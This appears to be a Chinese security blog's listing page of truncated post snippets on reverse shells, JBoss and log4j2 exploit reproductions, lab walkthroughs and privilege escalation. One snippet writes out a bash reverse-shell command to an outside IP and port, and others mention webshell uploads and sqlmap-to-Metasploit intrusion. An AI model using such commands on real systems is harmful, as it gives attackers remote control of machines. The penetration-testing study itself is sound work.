点击蓝字 关注我们日期:2022-05-19作者:hdsec介绍:对反弹shell传输的数据进行加密。0x00 前言借用百度词条的解释,在计算机网络上,OpenSSL是一个开放源代码的软件库包,应用程...
VulnHub-My_Tomcat_Host
靶机搭建靶机地址:https://www.vulnhub.com/entry/my-tomcat-host-1,457/靶机目标:目标1:提权查看root目录下的proof.txt文件。使用工具:nc...
权限维持-Netcat程序监控
最近在学习中发现 netcat 连接被动后门比如( crontab 写定时反弹shell / alias...
漏洞复现-CVE-2017-7504 JBoss反序列化远程代码执行
0x01 漏洞描述 JBoss是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理...
漏洞复现-CVE-2017-12149 JBoss反序列化远程代码执行
0x01 漏洞描述 JBoss是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理...
记一次内部红蓝对抗
前言年前部门内有个模拟对抗的比赛,记录下当时的过程,感谢导师带我玩。渗透过程本身是一个试错的过程,所以只记录下过程中的有效步骤。给定目标为域名,通过openvpn访问,于是先对*.xxx.com进行子...
常用反弹shell方法总结
0x01 bash反弹shellbash -i >&/dev/tcp/1.1.1.1/9999 0>&1解释:bash -i [interface] 表示启动sh...
Ladon9.1.5大文件读取&反弹Shell生成器
9.1.5更新日志LadonGUI 9.1.5 20220418[+]RevShell 反弹Shell命令生成(Ladon、NC、Perl、Bash、Python、PowerCat、Base64)La...
渗透测试中的提权思路【详细!】
提权Webshell:尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞(系统漏洞,服务器漏洞,第三方软件漏洞,数据库漏洞)来获取sh...
记一次艰难的提权
一.起进入登陆界面然后直接弱密码admin/admin,成功进入后台然后开始到处寻找可利用的点,于是找到了文件上传的点然后bp抓包,上传一句话木马,发现只是一个简单的前端过滤然后上传成功,返回了一个路...
盘一盘log4j2漏洞getshell方式
迟来的log4j2漏洞getshell^^1、漏洞描述Apache Log4j2是一款非常优秀的Java日志框架,由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发...
非法网站从sqlmap到msf提权远程连接成功
一 前言 这段时间一直在捣鼓sql注入和msf联合getshell,拿到网站服务器。1.1收集信息因为主要想练习sql注入,所以信息收集做的比较简单:通过sqlmap获取shell权限利用m...
13